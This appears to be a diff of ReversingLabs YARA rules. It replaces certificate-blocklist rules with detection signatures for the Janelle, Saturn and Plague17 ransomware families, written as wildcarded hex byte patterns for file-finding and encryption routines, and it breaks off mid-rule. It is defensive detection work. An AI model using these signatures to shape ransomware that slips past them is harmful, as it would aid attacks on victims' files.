+		id = "4fef3be5-8332-5ce2-b1e9-3993e6963331"
+		date = "2021-12-16"
+		modified = "2021-12-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L909-L925"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Janelle.yara#L1-L96"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7327b7cbeb616bc46c82975aed6b3ea1caafa74fd431e2d98ca55b00851e22c8"
+		logic_hash = "49f1eac82930606183ab9cf1d5c6c42534d58735876134793e9712e78eb5a4c7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Janelle"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:3c:c9" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0A82Bd1E144E8814D75B1A5527Bebf3E : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "f3d7d714-8085-524a-814c-ab8cc59ceb4f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L927-L943"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2534e58ce1e5adbb10dbacb664d40cc32faec341bdb93b926cc85b666cc7b77e"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$setup_env_p1 = {
+            00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 0A 06 02 7D ?? ??
+            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 08 6F
+            ?? ?? ?? ?? 74 ?? ?? ?? ?? 0D 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 75 ?? ?? ?? ?? 13 ??
+            11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 00 16 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 00 16
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 16 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 16 FE 01 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
+            12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 02
+        }
+		$setup_env_p2 = {
+            7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 00 16 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 16 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 16 28 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+            ?? 11 ?? 2C ?? 00 02 17 7D ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ??
+            ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 02
+            7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 00 2A
+        }
+		$find_files = {
+            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 00 00
+            03 28 ?? ?? ?? ?? 0B 00 07 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 02 11 ?? 06 7B ?? ?? ?? ??
+            28 ?? ?? ?? ?? 00 00 09 17 58 0D 09 08 8E 69 32 ?? 06 7B ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
+            00 00 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 7D ?? ??
+            ?? ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 00 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ??
+            8E 69 32 ?? 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE
+            ?? 00 00 DE ?? 26 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A
+        }
+		$encrypt_files = {
+            00 28 ?? ?? ?? ?? 0A 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 28 ?? ?? ??
+            ?? 04 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 08 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
+            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 1A 6F ?? ?? ?? ?? 00 07 06 16 06
+            8E 69 6F ?? ?? ?? ?? 00 07 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 03 19 73 ?? ?? ??
+            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 28 ?? ?? ?? ?? 00 11 ?? 11 ??
+            16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE
+            02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00
+            07 6F ?? ?? ?? ?? 00 00 DC 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA G2" and pe.signatures [ i ] . serial == "0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3e" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $setup_env_p* ) ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_469C2Cb0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Saturn : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Saturn ransomware."
 		author = "ReversingLabs"
-		id = "dd19b988-747d-55b9-825b-2ada1ca83691"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "70a8d937-aee5-54d8-9409-c5d2d0830a2b"
+		date = "2020-10-19"
+		modified = "2020-10-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L945-L961"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Saturn.yara#L1-L105"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "67ff84475cbe231f97daa3ce623689e7936db8e56be562778f8a4c1ebf7bf316"
+		logic_hash = "efa748346ad8c46e654542d302e81d633a2d12f421636c477431a12a34636132"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Saturn"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Services 1024 CA" and pe.signatures [ i ] . serial == "46:9c:2c:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4C0E636A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "beb2039c-3b0e-5649-96ca-40175493e62c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L963-L979"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "20169cf9ce3f271a22d1376bcf0ff0914f43937738c9ed61fd8e40179405136b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_1 = {
+            6A ?? C6 45 ?? ?? 8D 4D ?? 8B 3B 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 3B C8 74 ??
+            83 78 ?? ?? 8B C8 72 ?? 8B 08 FF 70 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A
+        }
+		$find_files_2_p1 = {
+            68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? FF 75
+            ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D
+            4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ??
+            0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ??
+            ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50
+            8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83
+        }
+		$find_files_2_p2 = {
+            F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF
+            15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B F0 80
+            BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 00
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B D0
+            8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? F6
+            85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E9
+        }
+		$encrypt_files_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 89 9D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 6A ?? FF B5
+            ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF D6 8B D8
+            83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 57
+            FF D6 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
+            A5 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ??
+            ?? ?? ?? 85 F6 0F 95 C3 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 89 B5 ?? ?? ?? ?? 56 53 FF
+        }
+		$encrypt_files_p2 = {
+            15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 56 ?? 8B 85 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 C8 8D 85 ?? ?? ?? ??
+            3B 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 6A ?? 0F 44 F2 56 6A ??
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 BA ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 FF B5
+            ?? ?? ?? ?? FF D6 B3 ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ??
+            ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77
+            ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B
+            8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID - (Enrich)" and pe.signatures [ i ] . serial == "4c:0e:63:6a" and 1320191999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_072714A9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Plague17 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Plague17 ransomware."
 		author = "ReversingLabs"
-		id = "15ad6936-78a4-58b1-8c68-27ec4ed38649"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "065c47b5-f459-529e-8046-7394a742b50a"
+		date = "2021-02-19"
+		modified = "2021-02-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L981-L997"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Plague17.yara#L1-L263"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8bea4cfb60056446043ef90a7d01ecc52d82d9e7005a145a4daa61a522ecd2ae"
+		logic_hash = "e0e518fc83a62d70b83df273c6ba469e6f0fdf9c035126428ec7561e04437b6f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Plague17"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID (Enrich)" and pe.signatures [ i ] . serial == "07:27:14:a9" and 1320191999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_00D8F35F4Eb7872B2Dab0692E315382Fb0 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "2c051732-76d7-5562-a79e-c5bbdc8373b2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L999-L1017"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "463757c59c32859163ea80e694e1f39239c857124aad3895f22f83b47645910c"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 89 E5 57 56 8D 85 ?? ?? ?? ?? 53 81 EC ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 31 C0 66 89
+            85 ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 50 ?? 8B
+            00 66 83 7C 50 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ??
+            ?? 2B 51 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 4D ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 8B 7D ?? 83 EC ?? 8B 00 8B 57 ?? 8D 8D ?? ?? ?? ?? 8D 14 50 C6 44
+            24 ?? ?? 89 04 24 89 8D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 83
+            EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 39 D0 0F
+            87 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 83 EC ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 7D ?? 8D
+        }
+		$find_files_p2 = {
